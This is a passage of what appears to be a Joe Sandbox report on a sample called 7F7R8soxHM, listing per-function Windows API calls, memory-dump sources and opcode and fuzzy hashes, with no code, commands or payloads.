                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: BuffCharLower$AllocVirtual_memmove
                      • String ID:
                      • API String ID: 3659485706-0
                      • Opcode ID: 0f83b3d8740088a5ed1b56419c8507039aefd58972d83fa5f0f48249409bd8bc
                      • Instruction ID: b1003cea3f160d2affcafa446fe813b36ef25e7f576b8b0f147034bc86ae7072
                      • Opcode Fuzzy Hash: 0f83b3d8740088a5ed1b56419c8507039aefd58972d83fa5f0f48249409bd8bc
                      • Instruction Fuzzy Hash: 2DC17C716083419FC714DF29C48096ABBE4FF88718F14996EF899AB351D731EA45CB82
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 00EE83D8
                      • CoUninitialize.OLE32 ref: 00EE83E3
                        • Part of subcall function 00ECDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00ECDAC5
                      • VariantInit.OLEAUT32(?), ref: 00EE83EE
                      • VariantClear.OLEAUT32(?), ref: 00EE86BF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                      • String ID:
                      • API String ID: 780911581-0
                      • Opcode ID: 267b627b31ee00c2eb18c966f23a16497de10c03d05a7bbbeb1da9df15635052
                      • Instruction ID: bc28fc5c2c00b609283159cce79c02faa85577fb454419a0bb81bf646207f75e
                      • Opcode Fuzzy Hash: 267b627b31ee00c2eb18c966f23a16497de10c03d05a7bbbeb1da9df15635052
                      • Instruction Fuzzy Hash: E1A139752047459FDB10DF15C585B2AB7E4BF88324F14A45DFA9AAB3A2CB30ED04CB42
                      APIs
                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F02C7C,?), ref: 00EC7C32
                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F02C7C,?), ref: 00EC7C4A
                      • CLSIDFromProgID.OLE32(?,?,00000000,00EFFB80,000000FF,?,00000000,00000800,00000000,?,00F02C7C,?), ref: 00EC7C6F
                      • _memcmp.LIBCMT ref: 00EC7C90
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: FromProg$FreeTask_memcmp
                      • String ID:
                      • API String ID: 314563124-0
                      • Opcode ID: 423e974e892c3d3a981c464986656cba94c26877cd8467102768ebf07dc40776
                      • Instruction ID: 980dffa56f629756cfd750c268a2b0cec5f0d2b22bd372c6a4c05feb1bcd997b
                      • Opcode Fuzzy Hash: 423e974e892c3d3a981c464986656cba94c26877cd8467102768ebf07dc40776
                      • Instruction Fuzzy Hash: A781E975A00109EFCB04DF94C984EEEB7B9FF89315F208598E555BB250DB72AE06CB60
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Variant$AllocClearCopyInitString
                      • String ID:
                      • API String ID: 2808897238-0
                      • Opcode ID: b666be7dd58516aa76b295ca81894c69ea5f2e2ef51e9cedd04bccb4ce5e4ead
                      • Instruction ID: 23519ea4c1c32eb1f78497f54d07248766ea45f6cbd1e7fa46aceaf320bb75de
                      • Opcode Fuzzy Hash: b666be7dd58516aa76b295ca81894c69ea5f2e2ef51e9cedd04bccb4ce5e4ead
                      • Instruction Fuzzy Hash: 825195317043019FDB24AF65D592F6AB3E5AF48310F20A81FF59AEB291DA719842DF11
                      APIs
                        • Part of subcall function 00E75045: _fseek.LIBCMT ref: 00E7505D
                        • Part of subcall function 00ED99BE: _wcscmp.LIBCMT ref: 00ED9AAE
                        • Part of subcall function 00ED99BE: _wcscmp.LIBCMT ref: 00ED9AC1
                      • _free.LIBCMT ref: 00ED992C
                      • _free.LIBCMT ref: 00ED9933
                      • _free.LIBCMT ref: 00ED999E
                        • Part of subcall function 00E92F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00E99C64), ref: 00E92FA9
                        • Part of subcall function 00E92F95: GetLastError.KERNEL32(00000000,?,00E99C64), ref: 00E92FBB
                      • _free.LIBCMT ref: 00ED99A6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                      • String ID:
                      • API String ID: 1552873950-0
                      • Opcode ID: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
                      • Instruction ID: 9380df5a4be3717832490c73cf1766dbd14c703021bc052efbc5ce0ef55ad866
                      • Opcode Fuzzy Hash: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
                      • Instruction Fuzzy Hash: 4B516EB1904218AFDF249F64CC81AAEBBB9EF48310F0054AEB609B7341DB715E81CF58
                      APIs
                      • GetWindowRect.USER32(0177E5D0,?), ref: 00EF9AD2
                      • ScreenToClient.USER32(00000002,00000002), ref: 00EF9B05
                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00EF9B72
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Window$ClientMoveRectScreen
                      • String ID:
                      • API String ID: 3880355969-0
                      • Opcode ID: 763f592abac16e110050cbfefbe515f7246308cf03a88560bfe0bbb33e605247
                      • Instruction ID: 7a32a8e60ee112965ba3f5e739aebb694a94bf82966b94f16124f8b9e06f0804
                      • Opcode Fuzzy Hash: 763f592abac16e110050cbfefbe515f7246308cf03a88560bfe0bbb33e605247
                      • Instruction Fuzzy Hash: 59512C34A0060DAFCF24DF68D880ABE7BB6FF44324F149259FA55AB291D730AD41DB94
                      APIs
                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00EE6CE4
                      • WSAGetLastError.WSOCK32(00000000), ref: 00EE6CF4
                        • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                        • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00EE6D58
                      • WSAGetLastError.WSOCK32(00000000), ref: 00EE6D64
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ErrorLast$__itow__swprintfsocket
                      • String ID:
                      • API String ID: 2214342067-0
                      • Opcode ID: e05c87063e8cbdf04a892380268493f999dfa548ac4b8352a2266b3e1d5cccbe
                      • Instruction ID: 1bb7243fa7e3f233d9fd2791b57df5448071c6aa6f8ac91652820f157da7517e
                      • Opcode Fuzzy Hash: e05c87063e8cbdf04a892380268493f999dfa548ac4b8352a2266b3e1d5cccbe
                      • Instruction Fuzzy Hash: B0416B75740200AFEB20AF24DC86F3A76E5EF58B24F44D418FA59BB2D3DA719D008B91
                      APIs
                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00EFF910), ref: 00EE67BA
                      • _strlen.LIBCMT ref: 00EE67EC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _strlen
                      • String ID:
                      • API String ID: 4218353326-0
                      • Opcode ID: 7707001ff9a98a611233a33cda36621fdd6a0855f8911fd97b2464b2e964ef6d
                      • Instruction ID: a857e20bccfd2d53c3d0d3cefbf2034a9f6ebf2dc246940b3ad35960da8d1647
                      • Opcode Fuzzy Hash: 7707001ff9a98a611233a33cda36621fdd6a0855f8911fd97b2464b2e964ef6d
                      • Instruction Fuzzy Hash: EE41C631A00108AFCB14EBA5DCC1FAEB3E9EF54354F149169F919B7292DB70AD40CB94
                      APIs
                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EDBB09
                      • GetLastError.KERNEL32(?,00000000), ref: 00EDBB2F
                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EDBB54
                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EDBB80
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CreateHardLink$DeleteErrorFileLast
                      • String ID:
                      • API String ID: 3321077145-0
                      • Opcode ID: 3352155ef35fc98e5b9b70710137c508e6075ab4ea215de7a8cd4e44b11d5073
                      • Instruction ID: 86aa49b062124f245d8e2fe3a64ac685eaa050a770e7ac5d1be1f09fc7418964
                      • Opcode Fuzzy Hash: 3352155ef35fc98e5b9b70710137c508e6075ab4ea215de7a8cd4e44b11d5073
                      • Instruction Fuzzy Hash: 1C412539200610DFDF11EF15C584A5DBBE1EF89324B09D499E94AAB362CB34FD01CB91
                      APIs
                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EF8B4D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: InvalidateRect
                      • String ID:
                      • API String ID: 634782764-0
                      • Opcode ID: a6cfc9daaab3b2468eba46eb226be013742e474108dba3a16915c78b78faf0ff
                      • Instruction ID: d71fa721d142b883d813735ee044ef95e41be0dd037228fb5f6aca0d4844051b
                      • Opcode Fuzzy Hash: a6cfc9daaab3b2468eba46eb226be013742e474108dba3a16915c78b78faf0ff
                      • Instruction Fuzzy Hash: 0331C37860020CBEEF209F18CE59FB937A5EB05324F64A652FB55F62A1DE30AD40D751
                      APIs
                      • ClientToScreen.USER32(?,?), ref: 00EFAE1A
                      • GetWindowRect.USER32(?,?), ref: 00EFAE90
                      • PtInRect.USER32(?,?,00EFC304), ref: 00EFAEA0
                      • MessageBeep.USER32(00000000), ref: 00EFAF11
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Rect$BeepClientMessageScreenWindow
                      • String ID:
                      • API String ID: 1352109105-0
                      • Opcode ID: decebcf7f8b65ff2e42530c415aee6a740b6236be86648fc2fa1c063a03cb7c5
                      • Instruction ID: bc1e532b06cdaa1c62ccd21030a7ba83f0f18c0f26c50abd12b76fed8e9057d2
                      • Opcode Fuzzy Hash: decebcf7f8b65ff2e42530c415aee6a740b6236be86648fc2fa1c063a03cb7c5
                      • Instruction Fuzzy Hash: 1B417AB560010DEFCB11CF58C884AA97BF5FF88354F1890B9E618EF251D730A882DB92
                      APIs
                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00ED1037
                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00ED1053
                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00ED10B9
                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00ED110B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: KeyboardState$InputMessagePostSend
                      • String ID:
                      • API String ID: 432972143-0
                      • Opcode ID: 49acf5e04e4b3e67ac917e9c2eae214b1dc35bd77c2ce9c88af83e5fa76c981d
                      • Instruction ID: afc6c3b0af375125d776a87d17454126139125d5f6476929626c3646da73184c
                      • Opcode Fuzzy Hash: 49acf5e04e4b3e67ac917e9c2eae214b1dc35bd77c2ce9c88af83e5fa76c981d
                      • Instruction Fuzzy Hash: 97313B70E40688BEFB30AA658C05BF9BBA9EF45314F08629BE590723D1C3754DC69751
                      APIs
                      • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00ED1176
                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00ED1192
                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00ED11F1
                      • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00ED1243
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: KeyboardState$InputMessagePostSend
                      • String ID:
                      • API String ID: 432972143-0
                      • Opcode ID: 317fe3cc99bf7b65ceae20adbba2c9621e1a51328d5a502e8faa2badf0493334
                      • Instruction ID: 5b7d5aca06f36eaba33d704ab92d21eeff32b327f76c3a1736c6b2cffede84f8
                      • Opcode Fuzzy Hash: 317fe3cc99bf7b65ceae20adbba2c9621e1a51328d5a502e8faa2badf0493334
                      • Instruction Fuzzy Hash: 85312B30941658BEEF308A658C047FEBBAAEB85314F04639BE590B23E1C3354956D751
                      APIs
                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EA644B
                      • __isleadbyte_l.LIBCMT ref: 00EA6479
                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EA64A7
                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EA64DD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                      • String ID:
                      • API String ID: 3058430110-0
                      • Opcode ID: d89ec1ffdbb564f5c5c438bd5a73b83dce64f18941a6f4a14556ac9722f096a6
                      • Instruction ID: 7a9fd5dfb8c7974e9094022d84befd829e84b87d98160a20e7e789599dce6f10
                      • Opcode Fuzzy Hash: d89ec1ffdbb564f5c5c438bd5a73b83dce64f18941a6f4a14556ac9722f096a6
                      • Instruction Fuzzy Hash: 3B31DE31600246AFDF218F75C844BBA7BE9FF4F314F195069E864AB1A1EB31E850DB90
                      APIs
                      • GetForegroundWindow.USER32 ref: 00EF5189
                        • Part of subcall function 00ED387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00ED3897
                        • Part of subcall function 00ED387D: GetCurrentThreadId.KERNEL32 ref: 00ED389E
                        • Part of subcall function 00ED387D: AttachThreadInput.USER32(00000000,?,00ED52A7), ref: 00ED38A5
                      • GetCaretPos.USER32(?), ref: 00EF519A
                      • ClientToScreen.USER32(00000000,?), ref: 00EF51D5
                      • GetForegroundWindow.USER32 ref: 00EF51DB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                      • String ID:
                      • API String ID: 2759813231-0
                      • Opcode ID: 7328002ba56645c8fac3af58f4fce0d797d4e7c005e6939a4e10b9815634ad29
                      • Instruction ID: 64c93eb1a0fd2c2dba7dccfbc5ad5d119c159d34d922afe43d95a35406d2a77d
                      • Opcode Fuzzy Hash: 7328002ba56645c8fac3af58f4fce0d797d4e7c005e6939a4e10b9815634ad29
                      • Instruction Fuzzy Hash: 99310C72901108AFDB04EFA5C8859EFB7F9EF98300F10906AE515F7252EA759E05CBA1
                      APIs
                        • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                      • GetCursorPos.USER32(?), ref: 00EFC7C2
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00EABBFB,?,?,?,?,?), ref: 00EFC7D7
                      • GetCursorPos.USER32(?), ref: 00EFC824
                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00EABBFB,?,?,?), ref: 00EFC85E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                      • String ID:
                      • API String ID: 2864067406-0
                      • Opcode ID: fc42499594ba4e0c1ccedbc739c396a3e8308bf62a0533941426ebe399e594fe
                      • Instruction ID: 466ffcb6a52cc7d55ecb3547a27d190996ef5a30557471dbca990ebdcf310f42
                      • Opcode Fuzzy Hash: fc42499594ba4e0c1ccedbc739c396a3e8308bf62a0533941426ebe399e594fe
                      • Instruction Fuzzy Hash: 5931713560005CAFCB15CF59C898EFA7BB6EF49364F248069FA05AB261C731AD50EB60
                      APIs
                      • __setmode.LIBCMT ref: 00E90BF2
                        • Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00ED7B20,?,?,00000000), ref: 00E75B8C
                        • Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00ED7B20,?,?,00000000,?,?), ref: 00E75BB0
                      • _fprintf.LIBCMT ref: 00E90C29
                      • OutputDebugStringW.KERNEL32(?), ref: 00EC6331
                        • Part of subcall function 00E94CDA: _flsall.LIBCMT ref: 00E94CF3
                      • __setmode.LIBCMT ref: 00E90C5E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                      • String ID:
                      • API String ID: 521402451-0
                      • Opcode ID: c2f448d0d28ca398795d23931d7291e2d81ae90d3a6bd1da6f428469a6adcb08
                      • Instruction ID: f4986c94511f50cac90c6a1834a87067a4a3c5ee19228429b6b156232ed49d9b
                      • Opcode Fuzzy Hash: c2f448d0d28ca398795d23931d7291e2d81ae90d3a6bd1da6f428469a6adcb08
                      • Instruction Fuzzy Hash: 391127B29042087EDF04B3B49C42DBEBBE9DF85320F14611AF108772D2DE615D479395
                      APIs
                        • Part of subcall function 00EC8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EC8669
                        • Part of subcall function 00EC8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8673
                        • Part of subcall function 00EC8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8682
                        • Part of subcall function 00EC8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8689
                        • Part of subcall function 00EC8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC869F
                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00EC8BEB
                      • _memcmp.LIBCMT ref: 00EC8C0E
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00EC8C44
